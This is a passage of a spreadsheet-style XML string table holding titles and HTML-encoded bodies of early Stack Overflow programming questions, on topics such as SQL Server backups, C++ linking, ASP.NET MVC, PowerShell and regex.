    <t>Sql Server Backup to UNC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've create a maintenance plan on my SQL Server 2005 server. The backup should be written to another server. I'm using a UNC path for this. The user running the SQL Agent jobs has full access to the other server. It's admin on both servers.&lt;/p&gt;
&lt;p&gt;The problem is that this statement fails ( has the correct server name ofcourse):&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;EXECUTE master.dbo.xp_create_subdir
  N'\\servername\c$\SqlServerBackup\Test'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The error I get is: 
Msg 22048, Level 16, State 1, Line 0
xp_create_subdir() returned error 123, 'The filename, directory name, or volume label syntax is incorrect.'&lt;/p&gt;
&lt;p&gt;Does anyone know what could be the problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OOP: Where to stop Abstracting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where do you draw the line to stop making abstractions and to start writing sane code? There are tons of examples of 'enterprise code' such as the dozen-file "FizzBuzz" program... even something simple such as an RTS game can have something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Player {} ;/// contains Weapons
class Weapons{} ;/// contains BulletTypes
class BulletType{} ;///contains descriptions of Bullets 
class Bullet{} ;///extends PlaceableObject and RenderableObject which can be placed/drawn respectively
class PlaceableObject{} ;///has x,y,z, coords
class RenderableObject{} ;///an object with a draw() command
class MovingObject{}; ///an object with a move() function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;etc... and it can turn into a nightmare. This can be drawn to its logical extreme, much like functional programming can be drawn to the extreme where you can create a language with only variables, function application, and anonymous function definitions (although I must admit that is slightly more elegant)... &lt;/p&gt;
&lt;p&gt;Any sane advice on this topic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Charts in webpages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What I'd like to accomplish is to present charts on webpages. For example aspx pages gridviews that present a two column table are able to be copied &amp;amp; placed into Excel then a chart created. The pages I currently use most are ASP.NET 3.0 or SharePoint team sites with stored procedures. People are very interested in how people perform chats in webpages. &lt;/p&gt;
&lt;p&gt;Thanks in advance,
Catto&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cross Domain User Tracking</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have several websites on different domains and I'd like to be able to track users' movements on these sites.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Obviously cookies are not feasable, because they don't cross domain borders. &lt;/li&gt;
&lt;li&gt;I could look at a combination of IP address and User Agent, but there are some cases where that does not work.&lt;/li&gt;
&lt;li&gt;I don't want to use flash or other plugins.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any ideas? Or am I doomed to rely on the IP/User_Agent combination?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GCC and ld can't find exported symbols...but they're there!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C++ library and a C++ application trying to use functions and classes exported from the library. The library builds fine and the application compiles but fails to link. The errors I get follow this form:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;app-source-file.cpp:(.text+0x2fdb): undefined reference to `lib-namespace::GetStatusStr(int)'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Classes in the library seem to be resolved just fine by the linker, but free functions and exported data (like a cosine lookup table) invariably result in the above error.&lt;/p&gt;
&lt;p&gt;I am using Ubuntu 8.04 (Hardy), and it is up to date with the latest Unbuntu packages.&lt;/p&gt;
&lt;p&gt;The command to link the library is (with other libraries removed):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;g++ -fPIC -Wall -O3 -shared -Wl,-soname,lib-in-question.so -o ~/project/lib/release/lib-in-question.so
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The command to link the application is (with other libraries removed):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;g++ -fPIC -Wall -O3  -L~/project/lib/release -llib-in-question -o ~/project/release/app-in-question
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Finally, it appears (as best as I can tell) that the symbols in question are being exported properly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;nm -D ~/project/lib/release/lib-in-question.so | grep GetStatusStr --&amp;gt; U _ZN3lib-namespace12GetStatusStrEi
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can replace the string [Foo alloc]&lt;cursor&gt; with [[Foo alloc]&lt;cursor&gt;]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;
&lt;li&gt;Is there a key shortcut for this in XCode?&lt;/li&gt;
&lt;li&gt;Can I implement an Applescript for this and run it within XCode?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>NHibernate custom SQL object creation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Somewhat-simplified example situation: I have entities A and B which are incredibly "heavy" domain objects. Loading one from the database is a pretty big deal. Then I have an entity C, which is a very simple object that has a label string, one A, and one B -- both lazy.&lt;/p&gt;
&lt;p&gt;I'm doing some low-level querying to create huge lists of C, so I know exactly what IDs I need to save for C.A and C.B, but I &lt;em&gt;don't&lt;/em&gt; want to load up entire objects and set them to the properties, because the overhead is insane.&lt;/p&gt;
&lt;p&gt;Instead, I want to just insert the IDs directly into my C entities, and then let the A and B properties on it be fully loaded later only if needed.&lt;/p&gt;
&lt;p&gt;I see the &lt;code&gt;&amp;lt;sql-insert/&amp;gt;&lt;/code&gt; tag in the documentation, but the section is &lt;em&gt;really&lt;/em&gt; sparse. &lt;/p&gt;
&lt;p&gt;Is there any way to do what I want to do inside the NHibernate framework, or should I just do raw SQL? I'm trying to keep database portability if possible, which makes me shy away from the raw option. Seems like there's got to be a better way I'm missing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>extern inline</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand that "inline" by itself is a suggestion to the compiler, and at its descretion it may or may not inline the function, and it will also produce linkable object code.&lt;/p&gt;
&lt;p&gt;I think that "static inline" does the same (may or may not inline) but will not produce linkable object code when inlined (since no other module could link to it).&lt;/p&gt;
&lt;p&gt;Where does "extern inline" fit into the picture?&lt;/p&gt;
&lt;p&gt;Assume I want to replace a preprocessor macro by an inline function and require that this function gets inlined (e.g., because it uses the __FILE__ and __LINE__ macros which should resolve for the caller but not this called function). That is, I want to see a compiler or linker error in case the function does not get inlined. Does "extern inline" do this? (I assume that, if it does not, there is no way to achieve this behavior other than sticking with a macro.)&lt;/p&gt;
&lt;p&gt;Are there differences between C++ and C?&lt;/p&gt;
&lt;p&gt;Are there differences between different compiler vendors and versions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Html.BeginForm and adding properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would I go about adding &lt;code&gt;enctype="multipart/form-data"&lt;/code&gt; to a form that is generated by using &lt;code&gt;&amp;lt;% Html.BeginForm(); %&amp;gt;&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>call OpenFileDialog from powershell</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I run the following, PowerShell hangs waiting for the dialog to close, even though the dialog is never displayed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[void] [Reflection.Assembly]::LoadWithPartialName( 'System.Windows.Forms' )
$d = New-Object Windows.Forms.OpenFileDialog
$d.ShowDialog( )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Calling &lt;code&gt;ShowDialog&lt;/code&gt; on a &lt;code&gt;Windows.Forms.Form&lt;/code&gt; works fine. I also tried creating a &lt;code&gt;Form&lt;/code&gt; and passing it as the parent to &lt;code&gt;$d.ShowDialog&lt;/code&gt;, but the result was no different.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to get the last inserted id using sqlite from Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to get the last inserted id using sqlite from Java? Google is giving me different answers--some say select the last-insert-rowid; others say call statement.getGeneratedKeys(). What's the best route to take? (I just want to return the id, not use it for other inserts or anything.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it worth mitigating security risks in every application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As web developers our applications are vulnerable to a number of security holes (xss,
sql-injects,etc...).  I'm a firm believer that if you're writing an app it should be
protected from all of these well known vulnerabilities. However, I'm having a hard time 
convincing my team (and management) that it's worth the effort. &lt;/p&gt;
&lt;p&gt;This leads me to wonder under what conditions should one fight the security fight?  What 
are the factors that should be considered when deciding what security vulnerabilities to
 mitigate and which to ignore?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trim whitespace from middle of string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the following regex to capture a fixed width "description" field that is always 50 characters long:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(?.{50})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My problem is that the descriptions sometimes contain a &lt;em&gt;lot&lt;/em&gt; of whitespace, e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"FLUID        COMPRESSOR                          "
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can somebody provide a regex that:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Trims all whitespace off the end&lt;/li&gt;
&lt;li&gt;Collapses any whitespace in between words to a &lt;strong&gt;single space&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Repairing wrong encoding in XML files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of our providers are sometimes sending XML feeds that are tagged as UTF-8 encoded documents but includes characters that are not included in the UTF-8 charset. This causes the parser to throw an exception and stop building the DOM object when these characters are encountered:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DocumentBuilder.parse(ByteArrayInputStream bais)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;throws the following exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;org.xml.sax.SAXParseException: Invalid byte 2 of 2-byte UTF-8 sequence.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to "capture" these problems early and avoid the exception (i.e. finding and removing those characters from the stream)? What I'm looking for is a "best effort" type of fallback for wrongly encoded documents. The correct solution would obviously be to attack the problem at the source and make sure that only correct documents are delivered, but what is a good approach when that is not possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way in .Net to programatically generate a DTD from an existing XML file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been looking around the System.Xml namespace, but don't see anything that would support this. Does anyone know if it's built into .Net, or would I have to obtain a third party library to do it?&lt;/p&gt;
&lt;p&gt;NOTE: I wish it were as simple as generating  an xsd, but that won't do for my specific situation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python/editline on OS X: Â£ sign seems to be bound to ed-prev-word</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On Mac OS X I canâ€™t enter a pound sterling sign (Â£) into the Python interactive shell.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;* Mac OS X 10.5.5
* Python 2.5.1 (r251:54863, Jan 17 2008, 19:35:17)
* European keyboard (Â£ is shift-3)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I type shift-3 in the Python interactive shell, I seem to invoke the previous word function, i.e. the cursor will move to the start of the last â€œwordâ€ (i.e. space-delimited item) typed on the line. When Iâ€™m back in the bash shell, typing shift-3 just produces a Â£, as expected.&lt;/p&gt;
&lt;p&gt;This version of Python apparently uses editline for its interactive shell, as opposed to readline. Iâ€™m guessing that one of the default editline key bindings binds shift-3 (or whatever editline sees when I type shift-3) to the ed-prev-word command.&lt;/p&gt;
&lt;p&gt;Iâ€™ve tried a few things in my ~/.editrc file to remove this binding, and they donâ€™t have any effect:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;bind -r Â£&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bind -r \243&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bind -r \156&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And another that causes a bus error:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;bind Â£ \243&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flash CS3 movie fails in browser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My AS3-heavy project tests fine in the IDE, but some parts don't work in the browser when published. Any ideas what could be causing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add query parameters to a GetMethod (using Java commons-httpclient)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Apache's commons-httpclient for Java, what's the best way to add query parameters to a GetMethod instance? If I'm using PostMethod, it's very straightforward:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PostMethod method = new PostMethod();
method.addParameter("key", "value");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;GetMethod doesn't have an "addParameter" method, though. I've discovered that this works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GetMethod method = new GetMethod("http://www.example.com/page");
method.setQueryString(new NameValuePair[] {
    new NameValuePair("key", "value")
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, most of the examples I've seen either hard-code the parameters directly into the URL, e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GetMethod method = new GetMethod("http://www.example.com/page?key=value");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or hard-code the query string, e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GetMethod method = new GetMethod("http://www.example.com/page");
method.setQueryString("?key=value");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is one of these patterns to be preferred? And why the API discrepancy between PostMethod and GetMethod? And what are all those other HttpMethodParams methods intended to be used for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to quarantine a specific subversion revision?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a revision that has been committed to SVN trunk which I would like to roll back.  However, I would like to retain the changes in some fashion such as a branch or even a patch file.  Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why don't my HtmlHelper extensions work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building an ASP.Net MVC website. Rather than have everything in one project, I've decided to separate the Web, Model and Controller out into different projects in the same solution, that reference each-other.&lt;/p&gt;
&lt;p&gt;The referencing goes like this:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Web ---[references]---&gt; Controller ---[references]---&gt; Model&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now I wanted to add 2 custom methods to the HtmlHelper class - they're called "IncludeScript" and "IncludeStyle". They each take a single string parameter, and generate a script or link tag respectively.&lt;/p&gt;
&lt;p&gt;I've created an extender class, according to documentation on the web, and written the two methods and compiled the application.&lt;/p&gt;
&lt;p&gt;Now, when I go into the Public.Master page (which is my main master-page, and one of the places where I intend to use these methods), I can enter code such as below:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;%= Html.IncludeScript("\js\jquery.js") %&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The IntelliSense picks up and IncludeScript method and shows me the syntax just fine. So I'd expect that everything should work.&lt;/p&gt;
&lt;p&gt;But it doesn't.&lt;/p&gt;
&lt;p&gt;Everything compiles, but as soon as I run the application, I get the following run-time error from line 14 of Default.aspx.cs:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;c:\\Projects\\PhoneReel\\PhoneReel.Web\\Views\\Shared\\Public.Master(11): error CS0117: 'System.Web.Mvc.HtmlHelper' does not contain a definition for 'IncludeScript'&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Here's the line of code that the error happens on:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;httpHandler.ProcessRequest(HttpContext.Current);&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Any ideas what could be going wrong here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ideal PHP Session Size?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a PHP form (mortgage app) that is about 400 fields, traffic on the site will be low.&lt;/p&gt;
&lt;p&gt;What is the ideal Session size for 400 fields going into a MySQL db?&lt;/p&gt;
&lt;p&gt;In &lt;code&gt;php.ini&lt;/code&gt; what do I set?&lt;/p&gt;
&lt;p&gt;Anything I should set that I am missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Formatting an if statement for readability</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to format this for readability?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (strpos($file, '.jpg',1) &amp;amp;&amp;amp; file_exists("$thumbsdir/$file") == false || strpos($file, '.gif',1) &amp;amp;&amp;amp; file_exists("$thumbsdir/$file") == false || strpos($file, '.png',1) &amp;amp;&amp;amp; file_exists("$thumbsdir/$file") == false) {
  createThumb("$gallerydir/$file", "$thumbsdir/$file",$thumbsize);
  fwrite($log,date("Y-m-d")." @ ".date("H:i:s")."  CREATED: $thumbsdir/$file\n");
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>silverlight blogs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With the asp.net MVC framework the blogs of the team members (Rob Conery, Phil Haack etc) really helped me on my way and made me feel comfortable the development was going in the right direction.
Is there something similar for Silverlight?&lt;/p&gt;
&lt;p&gt;-Edit:
I would like to mention that I would like to find members of the dev team themselves.
Currently the support for Silverlight across OS and browser is just too poor to make me care and invest time in it.
But I would like to keep a spying eye out so I can start caring when the framework fulfils it's potentials.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using C# to display powerpoint</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any good way to use a windows application written in C# to display/control a powerpoint slideshow? Ultimately I would like to show thumbnails in a form and clicking these thumbnails would advance the slides shown on a second monitor (similar to using Powerpoint itself to show a slideshow on a second monitor).&lt;/p&gt;
&lt;p&gt;I would like to be able to use Powerpoint Viewer if Powerpoint is not installed.&lt;/p&gt;
&lt;p&gt;There seems to be some ActiveX-controls that allows integration of Powerpoint in a form, but most of these seem to cost money, does anyone have experience using one of these controls?&lt;/p&gt;
&lt;p&gt;Edit: I know that there is an object model accessable by adding a reference to Microsoft.Office.InterOp.Powerpoint, but I want to be able to distribute the resulting program without having Microsoft Office as a prerequisite, that was why I mentioned Powerpoint Viewer because it can be distributed freely.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to generate unit test code for methods</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i want to write code for unit test to test my application code. I have different methods and now want to test these methods one by one in python script.
but i do not how to i write. can any one give me example of small code for unit testing in python.
i am thankful &lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF Unknown Message Received Event</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anywone know when a UnknownMessageReceived event on a WCF ServiceHost will be fired?&lt;/p&gt;
&lt;p&gt;I have some code where I capture the Faulted en UnknownMessageReceived event but even when I post a wrong message to a particular service I never get the event.&lt;/p&gt;
&lt;p&gt;Jochen&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create a friendly URL in ASP.NET MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I generate friendly URLs within the ASP.NET MVC Framework? For example, we've got a URL that looks like this:&lt;/p&gt;
&lt;pre&gt;http://site/catalogue/BrowseByStyleLevel/1&lt;/pre&gt;
&lt;p&gt;The 1 is Id of the study level (Higher in this case) to browse, but I'l like to reformat the URL in the same way StackOverflow does it.&lt;/p&gt;
&lt;p&gt;For example, these two URLs will take you to the same place:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/119323/nested-for-loops-in-different-languages"&gt;http://stackoverflow.com/questions/119323/nested-for-loops-in-different-languages&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/119323/"&gt;http://stackoverflow.com/questions/119323/&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; The friendly part of the url is referred to as a &lt;em&gt;slug&lt;/em&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# little endian or big endian?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the documentation of hardware that allows us to control it via UDP/IP,
I found the following fragment:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;In this communication protocol, DWORD is a 4 bytes data, WORD is a 2 bytes data,
  BYTE is a single byte data. The storage format is little endian, namely 4 bytes (32bits) data is stored as: d7-d0, d15-d8, d23-d16, d31-d24; double bytes (16bits) data is stored as: d7-d0 , d15-d8.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I am wondering how this translates to C#?
Do I have to convert stuff before sending it over?
For example, if I want to send over a 32 bit integer, or a 4 character string?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Random Gaussian Variables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a class in the standard library of .NET that gives me the functionality to create random variables that follow Gaussian distribution? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Database With ColdFusion on OS X</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;ColdFusion 8 Standard Edition on OS X Leopard.&lt;/p&gt;
&lt;p&gt;Developing a new website.&lt;/p&gt;
&lt;p&gt;What is the best database to use in conjunction with ColdFusion?&lt;/p&gt;
&lt;p&gt;Will be storing simple Credit Card operations, registration information, CRM info for an indie software company&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ORM support for compound primary keys</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've read that compound primary keys will &lt;a href="http://stackoverflow.com/questions/107404/what-are-the-down-sides-of-using-a-compositecompound-primary-key#108337"&gt;confuse the hell out of typical ORM code generators&lt;/a&gt;. Which ORMs work best with compound PKs and which to avoid? (I've a particular interest in .NET)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Xaml not WPF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am interested in using Xaml with expression blend for creating user interfaces in an application. However, because of the limitations of the target architecture, I cannot use WPF or C#.&lt;/p&gt;
&lt;p&gt;So, what I am interested in is in any examples / existing projects or advice from anyone who has experiance of this technology on the use of Xaml in it's "Pure" form as a specification language not tied to WPF.&lt;/p&gt;
&lt;p&gt;Specific questions:&lt;/p&gt;
&lt;p&gt;1) Is it possible to use Blend + Xaml without the WPF elements, or without C# backing classes?&lt;/p&gt;
&lt;p&gt;2) Are there any other implementations of Xaml parsers etc. which use different architectures, and can they work with blend or similar tools.&lt;/p&gt;
&lt;p&gt;3) Are there alternative editor / designer tools which can help in this situation?&lt;/p&gt;
&lt;p&gt;I am aware of the MyXaml and MycroXaml projects, and have found a lot of resources on the web about Xaml, but 99% of it relates directly to WPF. This is fine for understanding the concepts of Xaml, but doesn't help with the implimentation I need.&lt;/p&gt;
&lt;p&gt;Many thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which built-in .NET exceptions can I throw from my application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I need to throw an exception from within my application which of the built-in .NET exception classes can I use? Are they all fair game? When should I derive my own?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can Rhino Mocks Write My Expect Statements For Me?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a set of Visual Studio Team System unit (integration really) tests that talk to a remote database.  The tests are getting too slow and unwieldy.  I'd like to replace the entire set of tests with mocked out versions.  The problem is it's painful to write all the expect statements that mimic what an entire database does.  &lt;/p&gt;
&lt;p&gt;Does anyone know of a tool or add-on that will run an existing test, figure out what the non-mocked version actually returns and write out the Expect.Call's to duplicate the functionality?  I know this is a long shot, but I feel like it should be possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Functional to Relational mapping easier than Object to Relational?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Object-relational mapping has been well discussed, including on here.  I have experience with a few approaches and the pitfalls and compromises.  True resolution seems like it requires changes to the OO or relational models themselves.&lt;/p&gt;
&lt;p&gt;If using a functional language, does the same problem present itself?  It seems to me that these two paradigms should fit together better than OO and RDBMS.   The idea of thinking in sets in an RDBMS seems to mesh with the automatic parallelism that functional approaches seem to promise. &lt;/p&gt;
&lt;p&gt;Does anyone have any interesting opinions or insights?  What's the state of play in the industry?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Java Connection.close rollback?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does Java Connection.close rollback into a finally block?.&lt;/p&gt;
&lt;p&gt;I know .Net SqlConnection.close does it.&lt;/p&gt;
&lt;p&gt;With this I could make try/finally blocks without catch...&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try {
    conn.setAutoCommit(false);
    ResultSet rs = executeQuery(conn, ...);
    ....
    executeNonQuery(conn, ...);
    ....
    conn.commit();
} finally {
   conn.close();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to reverse engineer undocumented legacy application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Once I was assigned to a project which was about adding couple new features to the existing Java based web application. Because it was a matter of just couple simple features there was no chance for rewrite. &lt;/p&gt;
&lt;p&gt;Unfortunately, the code base came from a client without any documentation and the code itself wasn't commented too well. The original developers had left the client company so there wasn't too much knowledge available. To spice up thing structure of the user interface was stored in the DB. &lt;/p&gt;
&lt;p&gt;We managed to solve the rather interesting logic with debugger, some DB visualizing tools and plenty of mind map/relationship drawings on the paper. This was then documented in our wiki. But for some reason we did not create extensive test coverage to protect us - maybe the reason was that nobody really knew how the application and its business cases should work...&lt;/p&gt;
&lt;p&gt;How people have dealt with similar cases? Are there any specific tools for understanding application or its creator's logic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Loading custom framework in iPhone</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use an &lt;a href="http://www.cybergarage.org/net/upnp/c/index.html" rel="nofollow"&gt;external framework&lt;/a&gt; for UPnP browsing on the iPhone. The framework works perfectly on the Mac, But when I copy it to the iPhone app, it wouldn't run even if there's no code using the framework yet. &lt;/p&gt;
&lt;p&gt;It gives weird error that I can't understand.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Session started at 2008-10-20 15:32:34 +0200.]
objc[2701]: Class CAAnimationGroup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Transition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KeyframeAnimation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BasicAnimation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PropertyAnimation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Animation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SlotProxy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ContextImpl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Context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Filter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Layer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MediaTimingFunction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ScrollLayer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Transaction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TransformLayer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CATiledLayer is implemented in both /System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore and /Developer/Platforms/iPhoneSimulator.platform/Developer/SDKs/iPhoneSimulator2.0.sdk/System/Library/Frameworks/QuartzCore.framework/QuartzCore. Using implementation from /Developer/Platforms/iPhoneSimulator.platform/Developer/SDKs/iPhoneSimulator2.0.sdk/System/Library/Frameworks/QuartzCore.framework/QuartzCore.
objc[2701]: Class NSCursor is implemented in both /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit and /Developer/Platforms/iPhoneSimulator.platform/Developer/SDKs/iPhoneSimulator2.0.sdk/System/Library/PrivateFrameworks/WebCore.framework/WebCore. Using implementation from /Developer/Platforms/iPhoneSimulator.platform/Developer/SDKs/iPhoneSimulator2.0.sdk/System/Library/PrivateFrameworks/WebCore.framework/WebCore.
[Session started at 2008-10-20 15:32:37 +0200.]
Loading program into debuggerâ€¦
GNU gdb 6.3.50-20050815 (Apple version gdb-962) (Sat Jul 26 08:14:40 UTC 2008)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-apple-darwin".warning: Unable to read symbols for "/System/Library/Frameworks/UIKit.framework/UIKit" (file not found).
warning: Unable to read symbols from "UIKit" (not yet mapped into memory).
warning: Unable to read symbols for "/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics" (file not found).
warning: Unable to read symbols from "CoreGraphics" (not yet mapped into memory).
Program loaded.
sharedlibrary apply-load-rules all
Attaching to program: `/Users/danielchong/Library/Application Support/iPhone Simulator/User/Applications/305F04A8-840D-4A1A-ADD8-59CEC674152E/uPnP Browser2.app/uPnP Browser2', process 2701.
(gdb) 
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Ocx control in win form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to create instance of AxHost abstract class&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I test if a regex is valid in C# without throwing exception</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I allow users to enter a regular expression to match IP addresses, for doing an IP filtration in a related system. I would like to validate if the entered regular expressions are valid as a lot of userse will mess op, with good intentions though.&lt;/p&gt;
&lt;p&gt;I can of course do a Regex.IsMatch() inside a try/catch and see if it blows up that way, but are there any smarter ways of doing it? Speed is not an issue as such, I just prefer to avoid throwing exceptions for no reason.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you keep parents of floated elements from collapsing?</t>
  </si>
  <si>
